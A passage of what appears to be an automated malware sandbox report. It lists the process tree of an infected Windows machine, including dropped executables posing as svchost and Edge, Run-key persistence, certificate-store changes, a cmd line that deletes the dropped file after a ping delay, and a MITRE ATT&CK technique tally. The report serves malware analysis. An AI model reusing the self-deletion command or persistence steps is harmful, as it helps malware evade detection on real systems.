                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1616,2217425946702573450,2079987252242006708,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1672 /prefetch:2
                                                2⤵
                                                  PID:4472
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1616,2217425946702573450,2079987252242006708,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2068 /prefetch:8
                                                  2⤵
                                                    PID:3972
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1616,2217425946702573450,2079987252242006708,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2444 /prefetch:8
                                                    2⤵
                                                      PID:2960
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,2217425946702573450,2079987252242006708,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2872 /prefetch:1
                                                      2⤵
                                                        PID:1816
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,2217425946702573450,2079987252242006708,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2864 /prefetch:1
                                                        2⤵
                                                          PID:948
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,2217425946702573450,2079987252242006708,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3708 /prefetch:1
                                                          2⤵
                                                            PID:3948
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,2217425946702573450,2079987252242006708,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4480 /prefetch:8
                                                            2⤵
                                                              PID:3500
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,2217425946702573450,2079987252242006708,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4624 /prefetch:8
                                                              2⤵
                                                                PID:4792
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,2217425946702573450,2079987252242006708,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4600 /prefetch:8
                                                                2⤵
                                                                  PID:4184
                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                1⤵
                                                                  PID:4504
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault92af3871hde71h49b0h862ch6c09894234b5
                                                                  1⤵
                                                                  • Executes dropped EXE
                                                                  • Drops file in Program Files directory
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:3856
                                                                  • C:\Users\Admin\AppData\Local\Temp\svchost.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\\svchost.exe
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    PID:4916
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\Admin\AppData\Local\Temp\svchost.exe > nul
                                                                      3⤵
                                                                        PID:2532
                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                          ping -n 2 127.0.0.1
                                                                          4⤵
                                                                          • Runs ping.exe
                                                                          PID:6128
                                                                    • C:\Users\Admin\AppData\Local\Temp\svchos.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\\svchos.exe
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      PID:404
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe"
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      • Checks computer location settings
                                                                      • Adds Run key to start application
                                                                      • Checks whether UAC is enabled
                                                                      • Enumerates system info in registry
                                                                      • Modifies registry class
                                                                      • Modifies system certificate store
                                                                      • System policy modification
                                                                      PID:1600
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=gpu-process --field-trial-handle=2204,3200782582458027195,1065369448902235380,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2248 /prefetch:2
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        PID:4652
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2204,3200782582458027195,1065369448902235380,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        PID:560
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2204,3200782582458027195,1065369448902235380,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:8
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        PID:3556
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2204,3200782582458027195,1065369448902235380,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • Checks computer location settings
                                                                        PID:5240
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2204,3200782582458027195,1065369448902235380,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3628 /prefetch:1
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • Checks computer location settings
                                                                        PID:5280
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2204,3200782582458027195,1065369448902235380,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3640 /prefetch:1
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • Checks computer location settings
                                                                        PID:5392
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2204,3200782582458027195,1065369448902235380,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5004 /prefetch:8
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        PID:5552
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2204,3200782582458027195,1065369448902235380,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5472 /prefetch:8
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        PID:5736
                                                                  • C:\Windows\SysWOW64\TXPlatforn.exe
                                                                    C:\Windows\SysWOW64\TXPlatforn.exe -auto
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    PID:180
                                                                    • C:\Windows\SysWOW64\TXPlatforn.exe
                                                                      C:\Windows\SysWOW64\TXPlatforn.exe -acsi
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      PID:4000
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff9aba646f8,0x7ff9aba64708,0x7ff9aba64718
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    PID:4892
                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                    1⤵
                                                                      PID:5216
                                                                    • C:\Windows\system32\SystemSettingsAdminFlows.exe
                                                                      "C:\Windows\system32\SystemSettingsAdminFlows.exe" EnterProductKey
                                                                      1⤵
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:5844
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                      1⤵
                                                                      • Enumerates system info in registry
                                                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                      PID:6040
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x10c,0x110,0x114,0xdc,0x118,0x7ff9af274f50,0x7ff9af274f60,0x7ff9af274f70
                                                                        2⤵
                                                                          PID:6056
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1744 /prefetch:8
                                                                          2⤵
                                                                            PID:5292
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1628 /prefetch:2
                                                                            2⤵
                                                                              PID:5256
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2412 /prefetch:8
                                                                              2⤵
                                                                                PID:5336
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2944 /prefetch:1
                                                                                2⤵
                                                                                  PID:5700
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2816 /prefetch:1
                                                                                  2⤵
                                                                                    PID:3148
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3628 /prefetch:1
                                                                                    2⤵
                                                                                      PID:5088
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4692 /prefetch:8
                                                                                      2⤵
                                                                                        PID:5552
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4820 /prefetch:8
                                                                                        2⤵
                                                                                          PID:5672
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4948 /prefetch:8
                                                                                          2⤵
                                                                                            PID:4480
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4632 /prefetch:8
                                                                                            2⤵
                                                                                              PID:5540
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4692 /prefetch:8
                                                                                              2⤵
                                                                                                PID:4324
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3544 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:4900
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4572 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:5324
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5368 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:5296
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5504 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:3820
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5648 /prefetch:8
                                                                                                        2⤵
                                                                                                          PID:5452
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5636 /prefetch:8
                                                                                                          2⤵
                                                                                                            PID:5444
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4912 /prefetch:8
                                                                                                            2⤵
                                                                                                              PID:1784
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2200 /prefetch:1
                                                                                                              2⤵
                                                                                                                PID:5776
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1552 /prefetch:1
                                                                                                                2⤵
                                                                                                                  PID:5476
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
                                                                                                                  2⤵
                                                                                                                    PID:5340
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2924 /prefetch:1
                                                                                                                    2⤵
                                                                                                                      PID:5672
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4808 /prefetch:8
                                                                                                                      2⤵
                                                                                                                        PID:1772
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:1
                                                                                                                        2⤵
                                                                                                                          PID:5032
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
                                                                                                                          2⤵
                                                                                                                            PID:5172
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3040 /prefetch:8
                                                                                                                            2⤵
                                                                                                                              PID:2672
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:8
                                                                                                                              2⤵
                                                                                                                                PID:404
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:1
                                                                                                                                2⤵
                                                                                                                                  PID:4480
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6364 /prefetch:8
                                                                                                                                  2⤵
                                                                                                                                    PID:5144
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:1
                                                                                                                                    2⤵
                                                                                                                                      PID:5140
                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5608 /prefetch:8
                                                                                                                                      2⤵
                                                                                                                                        PID:4908
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5472 /prefetch:8
                                                                                                                                        2⤵
                                                                                                                                          PID:4404
                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=824 /prefetch:8
                                                                                                                                          2⤵
                                                                                                                                            PID:3948
                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1612 /prefetch:8
                                                                                                                                            2⤵
                                                                                                                                              PID:5136
                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5704 /prefetch:2
                                                                                                                                              2⤵
                                                                                                                                                PID:5248
                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,17458399410406500248,5783727382003052950,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5396 /prefetch:8
                                                                                                                                                2⤵
                                                                                                                                                  PID:5740
                                                                                                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                1⤵
                                                                                                                                                  PID:464
                                                                                                                                                • C:\Windows\System32\rundll32.exe
                                                                                                                                                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                  1⤵
                                                                                                                                                    PID:5776
                                                                                                                                                  • C:\Users\Admin\Desktop\Setup.exe
                                                                                                                                                    "C:\Users\Admin\Desktop\Setup.exe"
                                                                                                                                                    1⤵
                                                                                                                                                      PID:1596

                                                                                                                                                    Network

                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                    Execution

                                                                                                                                                    Scripting

                                                                                                                                                    1
                                                                                                                                                    T1064

                                                                                                                                                    Scheduled Task

                                                                                                                                                    1
                                                                                                                                                    T1053

                                                                                                                                                    Persistence

                                                                                                                                                    Modify Existing Service

                                                                                                                                                    1
                                                                                                                                                    T1031

                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                    3
                                                                                                                                                    T1060

                                                                                                                                                    Scheduled Task

                                                                                                                                                    1
                                                                                                                                                    T1053

                                                                                                                                                    Privilege Escalation

                                                                                                                                                    Bypass User Account Control

                                                                                                                                                    1
                                                                                                                                                    T1088

                                                                                                                                                    Scheduled Task

                                                                                                                                                    1
